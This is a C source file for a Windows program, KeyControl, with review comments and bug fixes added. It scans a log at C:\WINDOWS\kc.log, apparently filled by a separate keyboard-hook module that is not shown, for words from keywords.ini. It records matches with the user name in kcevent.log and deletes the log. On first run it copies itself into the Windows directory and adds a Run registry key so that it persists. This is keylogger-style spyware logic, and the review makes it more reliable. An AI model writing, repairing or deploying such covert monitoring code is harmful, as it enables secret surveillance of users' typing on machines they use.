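//==============================================================================
// KeyControl.c
// This program looks for keywords listed in a configuration file (keywords.ini).
// As soon as it finds one, FindWords passes it to SearchText(),
// which in turn searches for that word in the log (kc.log).
// If the keyword is present in the log, AddEvent is called.
//
// Thanks!
//==============================================================================
//
// Host artefacts named in this file (useful when triaging a machine):
//   - C:\WINDOWS\kc.log          read by SearchText, deleted after a match
//   - keywords.ini, kcevent.log  relative paths, resolved against the
//                                current working directory of the process
//   - <Windows directory>\KeyControl.exe   copy made by WinMain
//   - value "KeyControl" under
//     HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run   set by WinMain
//
// InitHook() and EndHook() are called from WinMain but are neither declared
// nor defined in this file; presumably they come from a separate hook module
// that produces kc.log -- not visible here.

// NOTE(review): the header names of the three #include lines were lost when
// this page was extracted. windows.h, stdio.h and string.h are what the code
// below needs -- confirm against the original file.
#include <windows.h>
#include <stdio.h>
#include <string.h>

/*
 * Append one record to kcevent.log: user name, matched keyword, date, time.
 *
 * word: NUL-terminated keyword that was found in the log.
 *
 * Returns 1 when the record was written, 0 when word is NULL or the event log
 * could not be opened. (The original was declared int but fell off the end
 * without returning a value.)
 */
int AddEvent(char word[100])
{
    MessageBox(0, "AddEvent", "", MB_TASKMODAL); /* debug trace; blocks until dismissed */

    if (word == NULL)
        return 0;

    /* One snapshot for both fields, so date and time cannot come from two
     * different instants (the original called GetLocalTime twice). */
    SYSTEMTIME now;
    GetLocalTime(&now);

    /* GetUserName can fail; keep the buffer a valid (empty) string in that
     * case instead of printing uninitialised stack bytes. */
    char user[50] = "";
    DWORD user_len = sizeof user;
    if (!GetUserName(user, &user_len))
        user[0] = '\0';

    /* "a" already positions every write at end of file, so no fseek is needed. */
    FILE *eventlog = fopen("kcevent.log", "a");
    if (eventlog == NULL)
        return 0;

    /* Written straight to the stream: same record layout as before, without
     * the fixed-size intermediate buffers that sprintf could overrun. */
    fprintf(eventlog, "%s\t\t%s\t\t%d/%d/%d\t%d:%d\n",
            user, word,
            now.wDay, now.wMonth, now.wYear,
            now.wHour, now.wMinute);
    fclose(eventlog);
    return 1;
}

/*
 * Search C:\WINDOWS\kc.log for the substring `text`.
 *
 * On a match the log file is deleted and AddEvent(text) is called, as in the
 * original. strstr stops at the first NUL byte, so only the part of the log
 * before an embedded NUL is searched.
 *
 * text: NUL-terminated keyword; NULL or empty is rejected, because an empty
 *       needle matches any buffer and would delete the log on every call.
 *
 * Returns 1 when the keyword was found, 0 otherwise (including every I/O or
 * allocation failure).
 */
int SearchText(char text[100])
{
    MessageBox(0, "SearchText", "", MB_TASKMODAL); /* debug trace; blocks until dismissed */

    const char *log_path = "C:\\WINDOWS\\kc.log";
    HANDLE hFile;
    char *buffer = NULL;
    DWORD file_size;
    DWORD bytes_read = 0;
    int found = 0;

    if (text == NULL || text[0] == '\0')
        return 0;

    hFile = CreateFile(log_path, GENERIC_READ, FILE_SHARE_READ, NULL,
                       OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
        return 0; /* the original went on to use the invalid handle */

    file_size = GetFileSize(hFile, NULL);
    if (file_size == INVALID_FILE_SIZE)
        goto out;

    /* One extra byte for the terminator: the file content is raw bytes and
     * strstr needs a NUL-terminated string. The original searched an
     * unterminated buffer and could read past the allocation. */
    buffer = (char *)GlobalAlloc(GMEM_FIXED, (SIZE_T)file_size + 1);
    if (buffer == NULL)
        goto out;

    /* A failed or short read is an error; the original leaked the buffer and
     * the handle on a short read and searched uninitialised memory when
     * nothing was read. */
    if (!ReadFile(hFile, buffer, file_size, &bytes_read, NULL) ||
        bytes_read != file_size)
        goto out;
    buffer[bytes_read] = '\0';

    found = strstr(buffer, text) != NULL;

out:
    if (buffer != NULL)
        GlobalFree((HGLOBAL)buffer); /* previously leaked on the match path */
    CloseHandle(hFile);

    if (found) {
        /* Same order as the original: handle closed, log removed, event recorded. */
        DeleteFile(log_path);
        AddEvent(text);
    }
    return found;
}

// FUNCTION WITH THE REPORTED BUG:
/*
 * Read keywords.ini line by line and pass every non-empty line to SearchText.
 *
 * Author's report: the function gets stuck here and does not continue the
 * search, although it works fine when launched manually.
 *
 * Defects fixed in this version:
 *   - fclose(ini) was called a second time after the if-block, and therefore
 *     also with ini == NULL when fopen had failed: undefined behaviour.
 *   - word[strlen(word) - 1] was written without checking fgets, so a failed
 *     or empty read indexed outside the buffer.
 *   - the newline-counting pre-pass skipped a last line that has no trailing
 *     newline; a single fgets loop handles it.
 *   - a line longer than the buffer was split into several "keywords"; the
 *     remainder of such a line is now discarded and only its first 99
 *     characters are searched.
 *
 * Returns the number of keywords for which SearchText reported a match
 * (0 when keywords.ini cannot be opened). The original returned nothing.
 */
int FindWords(void)
{
    MessageBox(0, "FindWords", "", MB_TASKMODAL); /* debug trace; blocks until dismissed */

    FILE *ini = fopen("keywords.ini", "r");
    if (ini == NULL)
        return 0;

    char word[100];
    int hits = 0;

    while (fgets(word, sizeof word, ini) != NULL) {
        /* Length up to the first CR or LF; handles both line-ending styles. */
        size_t len = strcspn(word, "\r\n");

        if (word[len] == '\0' && len == sizeof word - 1) {
            /* Buffer filled without reaching a line end: drop the rest of
             * the line so it is not read back as a separate keyword. */
            int c;
            while ((c = fgetc(ini)) != EOF && c != '\n') {
                /* discard */
            }
        }
        word[len] = '\0';

        if (len == 0)
            continue; /* blank line: nothing to search for */

        if (SearchText(word))
            hits++;
    }

    fclose(ini);
    return hits;
}

/*
 * Timer callback registered in WinMain through SetTimer; runs one FindWords
 * pass on every tick. The four parameters are unused.
 */
void CALLBACK KeyControlProc(HWND hWnd, UINT uMsg, UINT uTimerId, DWORD dwTime)
{
    FindWords();
}

/*
 * Entry point.
 *
 * If the running image is not already <Windows directory>\KeyControl.exe, it
 * copies itself there, calls InitHook(), writes that path as the value
 * "KeyControl" under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,
 * calls EndHook() and exits with 0.
 *
 * Otherwise (or when the copy fails) it calls InitHook(), starts a 900 ms
 * timer that drives KeyControlProc, pumps messages until GetMessage returns
 * 0, then stops the timer and calls EndHook().
 *
 * NOTE(review): the statements of WinMain are left exactly as found; only the
 * layout and the comments are new.
 */
int WINAPI WinMain(HINSTANCE hinstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    MSG msg;
    UINT uTimer;
    char aPath[126];
    char aWindowsDirectory[126];

    HMODULE hMe = GetModuleHandle(NULL);
    DWORD nRet = GetModuleFileName(hMe, aPath, 126); /* nRet is never read */

    GetWindowsDirectory(aWindowsDirectory, sizeof(aWindowsDirectory));
    strcat(aWindowsDirectory, "\\KeyControl.exe" );

    /* Non-zero strcmp: the process was started from some other path. */
    if (strcmp(aPath, aWindowsDirectory))
    {
        if(CopyFile(aPath, aWindowsDirectory, 0))
        {
            InitHook();
            HKEY hKey;
            RegCreateKey(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &hKey);
            RegSetValueEx(hKey, "KeyControl", 0, REG_SZ, aWindowsDirectory, sizeof(aWindowsDirectory));
            RegCloseKey(hKey);
            EndHook();
            return 0;
        }
    }

    InitHook();

    /* Thread timer (no window), id 1, 900 ms period. */
    if(!(uTimer = SetTimer(NULL, 1, 900, KeyControlProc)))
        return 0;

    while(GetMessage(&msg, NULL, 0, 0))
    {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }

    KillTimer( NULL, uTimer );
    EndHook();
    return msg.wParam;
}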